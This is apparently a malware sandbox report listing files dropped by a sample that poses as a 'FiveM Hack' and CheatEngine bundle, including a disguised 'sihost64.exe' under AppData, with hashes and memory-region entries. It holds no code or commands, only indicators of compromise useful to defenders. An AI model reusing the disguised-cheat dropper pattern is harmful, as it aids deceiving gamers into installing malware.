4183dbb8fd7de5fd5526a79b62e77fc30b8d1ec34ebaa3793b4f28beb36124084533e08b595f77305522bc847edfed1f9388c0d2ece66e6ac8acb7049b48ee86

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-U3M5U.tmp\prod0.zip

Filesize
5.7MB

MD5
6406abc4ee622f73e9e6cb618190af02

SHA1
2aa23362907ba1c48eca7f1a372c2933edbb7fa1

SHA256
fd83d239b00a44698959145449ebfcb8c52687327deac04455e77a710a3dfe1b

SHA512
dd8e43f8a8f6c6e491179240bdfefdf30002f3f2900b1a319b4251dfa9ca7b7f87ddf170ba868ab520f94de9cc7d1854e3bcfd439cad1e8b4223c7ee06d649f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
20d9b8388d0a545c67b169b9bdf068e2

SHA1
5a1de114843ea883d8a8ba1c3bff4bc3d49f5b96

SHA256
f489122ea8424bf8ca3c3b15b62e603293af022431b8f26d55b614265a46a2f4

SHA512
c447eb6dc95eff95519eb549356a6be9d2fa45b8844376dadb2f02100504f359b501641a6ed3e35552047f008b6c7650fb42de037f53ce51d201c0e8d5a9b0ec

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
aa1a4cb9b82a2730913ca416a26fb316

SHA1
a6ffb6a7692f844d77ccbf50bdb106167b3dcdd5

SHA256
b98c61d877f2f96d1440bde3a6ff9230e2b8570521b4fb9c63f2676613c27585

SHA512
e1d5aa8569512592be4b897f7f988d1705639b9dc416174a8943998704821a03532f07708cc218c3edb656f1c52e5b0b37b5a1cc7a35295999561cd31f3ebe73

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe

Filesize
3.1MB

MD5
609fea742d34dc1d53f0eeb4873b1a0a

SHA1
3232c52da3cb8f47a870162a35cdd75fcae60aea

SHA256
e2e15826b69778e381f25ac8f2b109a377b23f7cf79b5f482e81f4d28c30f95e

SHA512
27da89901268d153fd7158162fc8f2f3b99ec9a4aa24c281f93b500466552af776b00f0a33182386a62934c3e553561cbc23d3f5ebb0ea0366c04e046e1bcc90

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe

Filesize
7.7MB

MD5
ba7b34118537e3039ca82869140ed975

SHA1
c2d32b0570cb42fd0c23610b1514a4655783ba10

SHA256
22f6bc2477f06b718b25cb73b8446a80b27d1f8d389b7629a87c8c65fb51416c

SHA512
9c7a1b84b118c5bd95147e9822c4a8c9bbf9f1a08d9acf50e42b53a20718aaf72c4a388d93c31027b8d1552230ba2c05c3b5b7191e05833e416fed0cb34b56a5

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe

Filesize
23KB

MD5
046a99195ebe039bdb825ebd1ce560a4

SHA1
24ccf20694cf13269313d21c5b7bc4e3dff64d7b

SHA256
cc8e70780dc86ab74f1bba933145bd931e69a9334b21c270486b24ec67cbc522

SHA512
c5d1e5d73010283eb2975a52cc49841a3c89dd93e040b20ab5e17f763135af8cf3570dcc6d43cd25d42f117f480f82d359fd56542100f9d76e4e2b8e1c1cdc17

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI21242\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
1c58526d681efe507deb8f1935c75487

SHA1
0e6d328faf3563f2aae029bc5f2272fb7a742672

SHA256
ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

SHA512
8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI21242\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
724223109e49cb01d61d63a8be926b8f

SHA1
072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

SHA256
4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

SHA512
19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI21242\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
d12403ee11359259ba2b0706e5e5111c

SHA1
03cc7827a30fd1dee38665c0cc993b4b533ac138

SHA256
f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

SHA512
9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

Download Submit
\Users\Admin\AppData\Local\Temp\is-G4GD1.tmp\CheatEngine75.tmp

Filesize
2.9MB

MD5
1cdbf6da4defe32c9cb5908968a02fab

SHA1
d1a5eb2928d718d7a1517187f523c701c141b659

SHA256
87c1bb2236a874c97369b2cca0d55559fa917707cebddf7a5eabc691f8302487

SHA512
215697cae7ec2ba27fbc0b9208cb8676e27d21e55e0184fc68cbd1c1bd57863daf29348ea677e97af84628800ba15e6db884df872c3adc673a3cd7faed2888b9

Download Submit
\Users\Admin\AppData\Local\Temp\is-U3M5U.tmp\botva2.dll

Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
\Users\Admin\AppData\Local\Temp\is-U3M5U.tmp\zbShieldUtils.dll

Filesize
2.0MB

MD5
fad0877741da31ab87913ef1f1f2eb1a

SHA1
21abb83b8dfc92a6d7ee0a096a30000e05f84672

SHA256
73ff938887449779e7a9d51100d7be2195198a5e2c4c7de5f93ceac7e98e3e02

SHA512
f626b760628e16b9aa8b55e463c497658dd813cf5b48a3c26a85d681da1c3a33256cae012acc1257b1f47ea37894c3a306f348eb6bd4bbdf94c9d808646193ec

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
31KB

MD5
8edd8bd78fea19573ddf2d6dc10e5ea3

SHA1
f1d835a1696fddaf770046fa5eba9708bca3e1e0

SHA256
d8dbb7eb7c461222f348f2fbe4505142aa88c0cce3074cd0596f402e89084a1c

SHA512
731c16fb9a2558e9c98505e6252f5235b20f4b2de37512a62a5b2d1876a0f8bfee1ef5f0dde4a4226d399200b1c66286b9406ec3e5f1476c8cea3a0eab51f506

Download Submit
memory/592-61-0x00000000009E0000-0x00000000009E8000-memory.dmp

Filesize
32KB

Download
memory/592-60-0x0000000019E40000-0x000000001A122000-memory.dmp

Filesize
2.9MB

Download
memory/752-81-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/752-75-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/752-78-0x00000000001B0000-0x00000000001D0000-memory.dmp

Filesize
128KB

Download
memory/752-76-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/752-77-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/752-71-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/752-74-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/752-73-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/752-72-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/752-79-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/752-80-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/752-82-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/752-83-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1156-485-0x0000000001B40000-0x0000000001B46000-memory.dmp

Filesize
24KB

Download
memory/1728-160-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/1728-165-0x0000000002920000-0x0000000002928000-memory.dmp

Filesize
32KB

Download
memory/1812-66-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1812-63-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1812-64-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1812-65-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1812-69-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1812-62-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1868-404-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/1868-258-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/1872-84-0x00000000001D0000-0x0000000001F8F000-memory.dmp

Filesize
29.7MB

Download
memory/1872-144-0x00000000206A0000-0x000000002245E000-memory.dmp

Filesize
29.7MB

Download
memory/2020-398-0x00000000037A0000-0x00000000037AF000-memory.dmp

Filesize
60KB

Download
memory/2020-406-0x00000000037A0000-0x00000000037AF000-memory.dmp

Filesize
60KB

Download
memory/2020-405-0x0000000000400000-0x00000000006EE000-memory.dmp

Filesize
2.9MB

Download
memory/2460-49-0x0000000001E40000-0x0000000001E48000-memory.dmp

Filesize
32KB

Download
memory/2460-48-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2632-460-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-465-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-445-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-462-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-463-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-464-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-466-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-433-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-435-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-461-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/2632-458-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-457-0x000007FFFFFDA000-0x000007FFFFFDB000-memory.dmp

Filesize
4KB

Download
memory/2632-455-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-454-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-451-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-449-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-448-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-443-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-441-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-439-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-437-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2632-467-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2864-189-0x0000000002000000-0x0000000002008000-memory.dmp

Filesize
32KB

Download
memory/2864-188-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2960-419-0x0000000002710000-0x0000000002718000-memory.dmp

Filesize
32KB

Download
memory/2960-418-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/2972-34-0x00000000739B0000-0x0000000073F5B000-memory.dmp

Filesize
5.7MB

Download
memory/2972-26-0x00000000739B0000-0x0000000073F5B000-memory.dmp

Filesize
5.7MB

Download
memory/2972-25-0x00000000739B0000-0x0000000073F5B000-memory.dmp

Filesize
5.7MB

Download
memory/2972-24-0x00000000739B1000-0x00000000739B2000-memory.dmp

Filesize
4KB

Download
memory/2988-181-0x000007FEEC6D0000-0x000007FEECCB8000-memory.dmp

Filesize
5.9MB

Download
memory/3068-432-0x0000000002880000-0x0000000002888000-memory.dmp

Filesize
32KB

Download
memory/3068-431-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download